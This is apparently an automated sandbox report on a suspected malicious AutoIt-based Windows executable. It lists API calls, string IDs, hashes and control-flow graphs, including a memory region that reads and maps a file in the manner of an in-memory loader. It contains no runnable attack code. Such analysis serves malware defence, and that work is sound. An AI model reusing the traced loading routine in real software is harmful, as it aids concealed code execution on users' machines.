                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DdE$DdE$DdE$DdE$Variable must be of type 'Object'.
                                                          • API String ID: 0-847692887
                                                          • Opcode ID: e5472ecec7943bbd1c0ffce4b4212fab6bb279189e956ae0ffdc93671d208312
                                                          • Instruction ID: fa75cc77ef1a495e3a05d4f2b77ce72128807478188fc7fc52b91c9a25a79bf1
                                                          • Opcode Fuzzy Hash: e5472ecec7943bbd1c0ffce4b4212fab6bb279189e956ae0ffdc93671d208312
                                                          • Instruction Fuzzy Hash: 91A2C075A00205CFCF26CF98C480AAEB7B6FF59314F65846AE906AB351D735ED42CB81
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,003CE398), ref: 003F446A
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 003F447B
                                                          • FindClose.KERNEL32(00000000), ref: 003F448B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 7b6929b5deae4954c1bee8256f2387f2300706ec1feb75086f9788dcf1c24710
                                                          • Instruction ID: 5615f2a3a5dd553292b00f8d379e42f513dce1a85323437873c07e2e6e985476
                                                          • Opcode Fuzzy Hash: 7b6929b5deae4954c1bee8256f2387f2300706ec1feb75086f9788dcf1c24710
                                                          • Instruction Fuzzy Hash: 82E0D8324149086752106B38EC0D4FA775C9F05335F104765FD35D10D0E77499049599
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A0A5B
                                                          • timeGetTime.WINMM ref: 003A0D16
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A0E53
                                                          • Sleep.KERNEL32(0000000A), ref: 003A0E61
                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 003A0EFA
                                                          • DestroyWindow.USER32 ref: 003A0F06
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003A0F20
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 003D4E83
                                                          • TranslateMessage.USER32(?), ref: 003D5C60
                                                          • DispatchMessageW.USER32(?), ref: 003D5C6E
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D5C82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbE$pbE$pbE$pbE
                                                          • API String ID: 4212290369-527556986
                                                          • Opcode ID: 97dde995f8fcdbab2ee6b29884484d7d5a2a41db1319a1d5b71be16ef3175894
                                                          • Instruction ID: d4ff869b2818e0304da74c05abb706090585bf4783bac78e144d4f0f7f2ccc67
                                                          • Opcode Fuzzy Hash: 97dde995f8fcdbab2ee6b29884484d7d5a2a41db1319a1d5b71be16ef3175894
                                                          • Instruction Fuzzy Hash: 18B2B071608741DFDB2ADF24D884BAAB7E5FF85304F14491EE49A9B3A1CB70E845CB42

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003F8F5F: __time64.LIBCMT ref: 003F8F69
                                                            • Part of subcall function 00394EE5: _fseek.LIBCMT ref: 00394EFD
                                                          • __wsplitpath.LIBCMT ref: 003F9234
                                                            • Part of subcall function 003B40FB: __wsplitpath_helper.LIBCMT ref: 003B413B
                                                          • _wcscpy.LIBCMT ref: 003F9247
                                                          • _wcscat.LIBCMT ref: 003F925A
                                                          • __wsplitpath.LIBCMT ref: 003F927F
                                                          • _wcscat.LIBCMT ref: 003F9295
                                                          • _wcscat.LIBCMT ref: 003F92A8
                                                            • Part of subcall function 003F8FA5: _memmove.LIBCMT ref: 003F8FDE
                                                            • Part of subcall function 003F8FA5: _memmove.LIBCMT ref: 003F8FED
                                                          • _wcscmp.LIBCMT ref: 003F91EF
                                                            • Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9824
                                                            • Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9837
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003F9452
                                                          • _wcsncpy.LIBCMT ref: 003F94C5
                                                          • DeleteFileW.KERNEL32(?,?), ref: 003F94FB
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003F9511
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F9522
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F9534
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 6302d80579902492b348477bd0c6f4ec07da94d7cffe8da7534ead0d8e5e382b
                                                          • Instruction ID: b46510704fa1dc251f9db824b9ce3ad33316d1eeb602c50ff6c19297866446db
                                                          • Opcode Fuzzy Hash: 6302d80579902492b348477bd0c6f4ec07da94d7cffe8da7534ead0d8e5e382b
                                                          • Instruction Fuzzy Hash: 67C12AB1D0021DAADF22DF95CC85FEEB7BDAF45310F0040AAF609EA151EB309A458F65

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00393074
                                                          • RegisterClassExW.USER32(00000030), ref: 0039309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003930AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003930CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003930DC
                                                          • LoadIconW.USER32(000000A9), ref: 003930F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00393101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 387af742040695b893c6754c12f99170cd50bffab2ab29ba8b61d9935b7592be
                                                          • Instruction ID: 7349b462022c31dd6b143354fb94c19f8ff7c62299d37713447278124824bd0b
                                                          • Opcode Fuzzy Hash: 387af742040695b893c6754c12f99170cd50bffab2ab29ba8b61d9935b7592be
                                                          • Instruction Fuzzy Hash: 5F3127B1841309AFDB40DFA4EC85BD9BBF0FB09311F10816AE590E62A1D3B94596CF99

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00393074
                                                          • RegisterClassExW.USER32(00000030), ref: 0039309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003930AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003930CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003930DC
                                                          • LoadIconW.USER32(000000A9), ref: 003930F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00393101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 3d224649f5b86aa8f6c2c8d64a1fd737aeb7547cb76bf961d33c7f1b08923f36
                                                          • Instruction ID: 1d0de4c1066628862010ff6ffbb7c9cb0e8020af5b863db8cf13473597296d68
                                                          • Opcode Fuzzy Hash: 3d224649f5b86aa8f6c2c8d64a1fd737aeb7547cb76bf961d33c7f1b08923f36
                                                          • Instruction Fuzzy Hash: 4521E5B1951308AFDB00EFA4E848BDDBBF4FB08701F00812AF514A62A1D7B545598F99

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00394706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004552F8,?,003937AE,?), ref: 00394724
                                                            • Part of subcall function 003B050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00397165), ref: 003B052D
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003971A8
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003CE8C8
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003CE909
                                                          • RegCloseKey.ADVAPI32(?), ref: 003CE947
                                                          • _wcscat.LIBCMT ref: 003CE9A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 06f27eb79a69cf9465cd206b4ea374cdc7f41969b0fd08c97cddde41bcf079c6
                                                          • Instruction ID: f3349f159b8c0671816bf3aa6475712ec59916192de91250d07eca93026658b0
                                                          • Opcode Fuzzy Hash: 06f27eb79a69cf9465cd206b4ea374cdc7f41969b0fd08c97cddde41bcf079c6
                                                          • Instruction Fuzzy Hash: B5717C715083019EC706EF65E841AABBBE8FF88350F81493EF445CB1A2EB71D949CB56

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 760 393633-393681 762 3936e1-3936e3 760->762 763 393683-393686 760->763 762->763 766 3936e5 762->766 764 393688-39368f 763->764 765 3936e7 763->765 770 39374b-393753 PostQuitMessage 764->770 771 393695-39369a 764->771 768 3cd0cc-3cd0fa call 3a1070 call 3a1093 765->768 769 3936ed-3936f0 765->769 767 3936ca-3936d2 DefWindowProcW 766->767 778 3936d8-3936de 767->778 807 3cd0ff-3cd106 768->807 772 3936f2-3936f3 769->772 773 393715-39373c SetTimer RegisterWindowMessageW 769->773 777 393711-393713 770->777 775 3cd154-3cd168 call 3f2527 771->775 776 3936a0-3936a2 771->776 779 3936f9-39370c KillTimer call 39443a call 393114 772->779 780 3cd06f-3cd072 772->780 773->777 782 39373e-393749 CreatePopupMenu 773->782 775->777 801 3cd16e 775->801 783 3936a8-3936ad 776->783 784 393755-39375f call 3944a0 776->784 777->778 779->777 792 3cd0a8-3cd0c7 MoveWindow 780->792 793 3cd074-3cd076 780->793 782->777 788 3cd139-3cd140 783->788 789 3936b3-3936b8 783->789 802 393764 784->802 788->767 797 3cd146-3cd14f call 3e7c36 788->797 799 3936be-3936c4 789->799 800 3cd124-3cd134 call 3f2d36 789->800 792->777 794 3cd078-3cd07b 793->794 795 3cd097-3cd0a3 SetFocus 793->795 794->799 803 3cd081-3cd092 call 3a1070 794->803 795->777 797->767 799->767 799->807 800->777 801->767 802->777 803->777 807->767 811 3cd10c-3cd11f call 39443a call 39434a 807->811 811->767
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 003936D2
                                                          • KillTimer.USER32(?,00000001), ref: 003936FC
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039371F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0039372A
                                                          • CreatePopupMenu.USER32 ref: 0039373E
                                                          • PostQuitMessage.USER32(00000000), ref: 0039374D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated$%B
                                                          • API String ID: 129472671-3505266058
                                                          • Opcode ID: e92e21c7f41dac6c821b2704e10807f20bcb47f80d4e4331fba070726eb8a408
                                                          • Instruction ID: 2dde4b8da19dea5faccc200f179d7b2d4b636c71d038aab57e29236705a3b4e8
                                                          • Opcode Fuzzy Hash: e92e21c7f41dac6c821b2704e10807f20bcb47f80d4e4331fba070726eb8a408
                                                          • Instruction Fuzzy Hash: 4E414AF2200605BBDF136FA8DC59FBA3758EB01301F140139FA02D62E2DB74AD15976A

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00393A50
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00393A5F
                                                          • LoadIconW.USER32(00000063), ref: 00393A76
                                                          • LoadIconW.USER32(000000A4), ref: 00393A88
                                                          • LoadIconW.USER32(000000A2), ref: 00393A9A
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00393AC0
                                                          • RegisterClassExW.USER32(?), ref: 00393B16
                                                            • Part of subcall function 00393041: GetSysColorBrush.USER32(0000000F), ref: 00393074
                                                            • Part of subcall function 00393041: RegisterClassExW.USER32(00000030), ref: 0039309E
                                                            • Part of subcall function 00393041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003930AF
                                                            • Part of subcall function 00393041: InitCommonControlsEx.COMCTL32(?), ref: 003930CC
                                                            • Part of subcall function 00393041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003930DC
                                                            • Part of subcall function 00393041: LoadIconW.USER32(000000A9), ref: 003930F2
                                                            • Part of subcall function 00393041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00393101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: a02527d924ecb9a5f52b2d78abb65cd3bf5d8bcac1e26c8c4db29579efb172ca
                                                          • Instruction ID: e0c72611dc3162622b264bd00e8103675179cad146d244accc20066c20a935bb
                                                          • Opcode Fuzzy Hash: a02527d924ecb9a5f52b2d78abb65cd3bf5d8bcac1e26c8c4db29579efb172ca
                                                          • Instruction Fuzzy Hash: CA215C74D10708AFEF11DFA4EC59BAD7BB4FB08712F00417AF504AA2A2D3B596458F88

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RE
                                                          • API String ID: 1825951767-2473233043
                                                          • Opcode ID: 5da8ff9fc5d56a18e3f960abba3b7918f43e3f607aaaad670f758ddb0802b255
                                                          • Instruction ID: ce0df4951935cf9e22d25f04050238759b5fa03b277a642af9307ec22e99dadf
                                                          • Opcode Fuzzy Hash: 5da8ff9fc5d56a18e3f960abba3b7918f43e3f607aaaad670f758ddb0802b255
                                                          • Instruction Fuzzy Hash: 3BA150B2D1021D9ADF06EBA4DC51EFEB778BF15300F44052AF416AB192EF749A49CB60

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003B0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B0193
                                                            • Part of subcall function 003B0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 003B019B
                                                            • Part of subcall function 003B0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B01A6
                                                            • Part of subcall function 003B0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B01B1
                                                            • Part of subcall function 003B0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003B01B9
                                                            • Part of subcall function 003B0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003B01C1
                                                            • Part of subcall function 003A60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0039F930), ref: 003A6154
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0039F9CD
                                                          • OleInitialize.OLE32(00000000), ref: 0039FA4A
                                                          • CloseHandle.KERNEL32(00000000), ref: 003D45C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: <WE$\TE$%B$SE
                                                          • API String ID: 1986988660-1739124915
                                                          • Opcode ID: cc2f95f64634ccfd297232235da82d48443cbc71c185568fef52332280341aee
                                                          • Instruction ID: 3628f5aa9497a19cea43fb4c179b3a0ae732d18643aa7a590227ccb99664285f
                                                          • Opcode Fuzzy Hash: cc2f95f64634ccfd297232235da82d48443cbc71c185568fef52332280341aee
                                                          • Instruction Fuzzy Hash: AA81BBB0911B40DF8785EF29A8617387BE5EB9A307B90813AD819CB273E7749485CF19

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 983 1318070-131811e call 1315a30 986 1318125-131814b call 1318f80 CreateFileW 983->986 989 1318152-1318162 986->989 990 131814d 986->990 995 1318164 989->995 996 1318169-1318183 VirtualAlloc 989->996 991 131829d-13182a1 990->991 993 13182e3-13182e6 991->993 994 13182a3-13182a7 991->994 997 13182e9-13182f0 993->997 998 13182b3-13182b7 994->998 999 13182a9-13182ac 994->999 995->991 1000 1318185 996->1000 1001 131818a-13181a1 ReadFile 996->1001 1002 13182f2-13182fd 997->1002 1003 1318345-131835a 997->1003 1004 13182c7-13182cb 998->1004 1005 13182b9-13182c3 998->1005 999->998 1000->991 1010 13181a3 1001->1010 1011 13181a8-13181e8 VirtualAlloc 1001->1011 1012 1318301-131830d 1002->1012 1013 13182ff 1002->1013 1006 131836a-1318372 1003->1006 1007 131835c-1318367 VirtualFree 1003->1007 1008 13182db 1004->1008 1009 13182cd-13182d7 1004->1009 1005->1004 1007->1006 1008->993 1009->1008 1010->991 1014 13181ea 1011->1014 1015 13181ef-131820a call 13191d0 1011->1015 1016 1318321-131832d 1012->1016 1017 131830f-131831f 1012->1017 1013->1003 1014->991 1023 1318215-131821f 1015->1023 1020 131833a-1318340 1016->1020 1021 131832f-1318338 1016->1021 1019 1318343 1017->1019 1019->997 1020->1019 1021->1019 1024 1318221-1318250 call 13191d0 1023->1024 1025 1318252-1318266 call 1318fe0 1023->1025 1024->1023 1031 1318268 1025->1031 1032 131826a-131826e 1025->1032 1031->991 1033 1318270-1318274 CloseHandle 1032->1033 1034 131827a-131827e 1032->1034 1033->1034 1035 1318280-131828b VirtualFree 1034->1035 1036 131828e-1318297 1034->1036 1035->1036 1036->986 1036->991
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01318141
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01318367
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                          • Instruction ID: 29ec41bd95fb6177258684504dbfd3a66e912b8288dda8626ed6ec864812baa7
                                                          • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                          • Instruction Fuzzy Hash: 5FA10B74E00209EBDB18CF94C894BEEBBB5FF48308F208599E605BB284D7759A41CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1114 3939d5-393a45 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00393A03
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00393A24
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00393A38
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00393A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
